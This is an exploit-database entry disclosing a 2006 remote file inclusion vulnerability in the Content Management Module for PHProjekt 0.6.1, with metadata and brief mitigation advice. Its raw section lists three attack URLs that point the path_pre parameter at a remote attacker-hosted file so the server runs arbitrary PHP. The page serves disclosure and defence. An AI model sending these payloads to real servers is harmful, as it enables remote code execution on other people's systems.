header-logo
Suggest Exploit
vendor:
Content Management Module for PHProjekt
by:
the master
7,5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: Content Management Module for PHProjekt
Affected Version From: 0.6.1
Affected Version To: 0.6.1
Patch Exists: NO
Related CWE: N/A
CPE: a:phprojekt:content_management_module_for_phprojekt:0.6.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Content management module for PHProjekt v0.6.1 Remote File Inclusion Vulnerability

This vulnerability allows an attacker to include a remote file on the vulnerable server. This can be exploited to execute arbitrary PHP code on the vulnerable server by including a malicious file from a remote location.

Mitigation:

The best way to mitigate this vulnerability is to ensure that user input is properly sanitized and validated before being used in a file inclusion operation.
Source

Exploit-DB raw data:

########################################################################
#  Content management module for PHProjekt v0.6.1  Remote File Inclusion Vulnerability
#
#  Download: http://www.mariovaldez.net/software/cm_4p/files/cm4p_0.6.1.tar.gz
#
#  Found By: the master
#
########################################################################
#  exploit:
#
#  http://[Target]/[Path]/cm_navigation-33.inc.php?path_pre=http://cmd.gif?
#  http://[Target]/[Path]/cm_navigation.inc.php?path_pre=http://cmd.gif?
#  http://[Target]/[Path]/cm_summary.inc.php?path_pre=http://cmd.gif?
########################################################################

# milw0rm.com [2006-08-21]

Navigation

Suggest Exploit

Services By CQR